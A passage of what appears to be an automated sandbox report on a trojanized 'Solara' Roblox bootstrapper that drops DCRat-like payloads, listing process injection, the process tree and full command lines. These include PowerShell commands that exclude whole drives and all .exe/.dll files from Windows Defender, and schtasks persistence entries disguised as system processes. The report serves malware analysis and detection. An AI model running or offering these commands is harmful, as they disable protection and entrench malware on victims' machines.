Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Token: SeDebugPrivilege N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Solara.exe
PID 5088 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Solara.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 1380 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 1380 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3444 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 3444 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4556 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Program Files (x86)\Internet Explorer\en-US\services.exe
PID 4556 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Program Files (x86)\Internet Explorer\en-US\services.exe
PID 408 wrote to memory of 5284 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 408 wrote to memory of 5284 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 408 wrote to memory of 5520 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 408 wrote to memory of 5520 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 408 wrote to memory of 5520 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\Solara.exe

"C:\Users\Admin\AppData\Local\Temp\Solara.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\Globalization\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Windows\Globalization\smss.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 7 /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 9 /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\INF\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\INF\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Globalization\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\unsecapp.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SppExtComObj.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Internet Explorer\en-US\services.exe

"C:\Program Files (x86)\Internet Explorer\en-US\services.exe"

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 34C2A3A69E024CB4C7B0C517EDF7E726

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9CA52EDF1FB02B86CAF11FFDF8772F58

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oensqgEQyM.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB69.tmp" "c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC06.tmp" "c:\Program Files (x86)\Internet Explorer\en-US\CSC303836A264394C678FCD25C781BA961.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxy4xula\xxy4xula.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECE0.tmp" "c:\Windows\ServiceProfiles\LocalService\AppData\Local\CSC70844B7B29D341BB8FFEB0D5E4D717C1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ygr5rsmn\ygr5rsmn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDAC.tmp" "c:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\CSCD001DCB125214A0B80DFE133AEEDE5C5.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wuucn45\5wuucn45.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE38.tmp" "c:\DriversavessessionDlldhcp\CSC76713A34752A4219B360FE67E2AA80B4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtiq0lxh\qtiq0lxh.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEE4.tmp" "c:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\CSC12D29C43C81F4764B8FEAC1A37A61A8B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jxvfqvj3\jxvfqvj3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF90.tmp" "c:\Windows\INF\CSCDBBF15C0A2E44A13B9B3BE52BA80BFB1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqptlwsx\hqptlwsx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF04B.tmp" "c:\Recovery\WindowsRE\CSCD4EEB679672C4DAB87BA924129211EBC.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ycibn0e\4ycibn0e.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF117.tmp" "c:\Windows\System32\CSC62BB1B8EFB064D2FB0E4DA2F7861CE5D.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

